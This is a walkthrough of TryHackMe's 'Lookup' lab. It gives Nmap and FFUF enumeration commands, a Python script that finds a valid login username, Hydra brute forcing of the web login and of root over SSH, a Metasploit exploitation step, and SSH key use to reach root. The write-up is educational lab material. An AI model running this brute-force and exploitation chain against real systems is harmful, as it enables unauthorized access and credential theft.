Lookup — TryHackMe by rradhasan

R-Rad Hasan
5 min readJan 8, 2025

--

Banner of Lookup

About The Lab

Room Name: Lookup
Room Link: https://tryhackme.com/r/room/lookup

This lab falls under the “easy” category, making it an excellent starting point for beginners. It offers valuable learning opportunities and introduces foundational concepts, which I believe beginners will enjoy exploring.

What I Learned From this Challenge

Through this lab, I learned how to use Hydra effectively and how to create a brute-force program using Python. Additionally, I gained a better understanding of when to utilize these tools for different scenarios.

Prerequisites

Although this lab is categorized as “easy,” it requires a foundational knowledge of the following topics and tools:

  • Nmap (for service enumeration)
  • Fuzzing (e.g., using FFUF)
  • Metasploit Framework
  • Shell Commands
  • Hydra
  • Python Programming (for scripting and automation)
  • Linux Command Line (basic proficiency)

If you are familiar with these areas, you will find this lab manageable and enjoyable.

Task Completion Section

Initial Setup

  1. Start the machine provided by the lab.
  2. Copy the IP address of the target machine and add it to your /etc/hosts file with the domain lookup.thm (ensure you open the file with sudo permissions). This step will allow you to resolve the domain correctly.

[User Flag]

Step 1: Service Enumeration

Use Nmap to identify services and versions running on the target machine. Run the following command:

nmap -sV -A lookup.thm

Step 2: Subdomain Enumeration

After identifying the services, use FFUF to enumerate subdomains:

ffuf -u http://FUZZ.lookup.thm -w /path/to/wordlist

Once a subdomain is identified, update your /etc/hosts file to include the subdomain. Navigate to the subdomain, where you will find a login page.

Step 3: Username Enumeration

Since no credentials are available, brute force the username using a custom Python script:

import requests
url = 'http://lookup.thm/login.php'
usernamesFile = '/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt'
with open(usernamesFile, 'r') as file:
usernames = file.readlines()
for username in usernames:
response = requests.post(url, data={'username': username.strip(), 'password': 'test'})
if "Wrong password" in response.text:
print(f"Valid username found: {username.strip()}")
break

Run the script and obtain the valid username.

Step 4: Password Brute Forcing

With the identified username, use Hydra to brute force the password:

hydra -l <username> -P /path/to/password-list http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"

Step 5: Gaining Access

Log in with the identified credentials. Once logged in, navigate the web application, and locate a “Settings” option. Clicking this will reveal the application version.

Step 6: Exploitation

Using the application version, search for available exploits using searchsploit:

searchsploit <application-version>

Load the identified exploit in Metasploit:

msfconsole
use <exploit-path>
set RHOSTS lookup.thm
set USERNAME <username>
set PASSWORD <password>
exploit

Step 7: Privilege Escalation

Once you gain a Meterpreter session, switch to a shell:

shell

Use the find command to locate files with interesting permissions:

find / -type f -user <username> 2>/dev/null

Navigate to the identified file or directory, and extract sensitive information, such as credentials or password lists. Save the extracted password list to a file.

Step 8: Hydra for Privilege Escalation

Use Hydra again to brute force root credentials:

hydra -l root -P /path/to/password-list ssh://lookup.thm

Step 9: Root Access

Once the root credentials are identified, log in via SSH. If an id_rsa file is available, save it, set appropriate permissions, and use it for login:

chmod 600 id_rsa
ssh -i id_rsa root@lookup.thm

Congratulations! You now have root access. Collect the flag from the root directory.

How Was My Experience

Initially, I assumed this lab would be straightforward, but it turned out to be more challenging than expected. Despite being labeled “easy,” the lab tested my skills in multiple areas, including scripting, enumeration, and exploitation. The blend of tasks pushed me out of my comfort zone and reinforced my understanding of essential tools and techniques. Overall, this lab was both enjoyable and educational, and I highly recommend it to anyone looking to strengthen their foundational skills.

Conclusion

The Lookup lab on TryHackMe proved to be a fascinating and enriching experience. While initially categorized as “easy,” it presented challenges that required leveraging multiple skills, including subdomain enumeration, brute forcing, scripting, and exploitation using tools like Hydra and Metasploit. It also provided an excellent opportunity to practice using Python for brute force enumeration, enhancing programming and automation skills.

This lab emphasized the importance of understanding services and their vulnerabilities, demonstrating how to utilize publicly available exploit databases effectively. The journey from discovery to exploitation and privilege escalation offered practical insights into real-world penetration testing workflows.

Overall, the lab was both challenging and rewarding, offering valuable lessons in persistence, creativity, and technical skills. I highly recommend this lab to beginners and intermediates looking to solidify their foundations in enumeration, exploitation, and privilege escalation.

--

--

R-Rad Hasan
R-Rad Hasan

Written by R-Rad Hasan

Bug Hunter | Security Researcher

No responses yet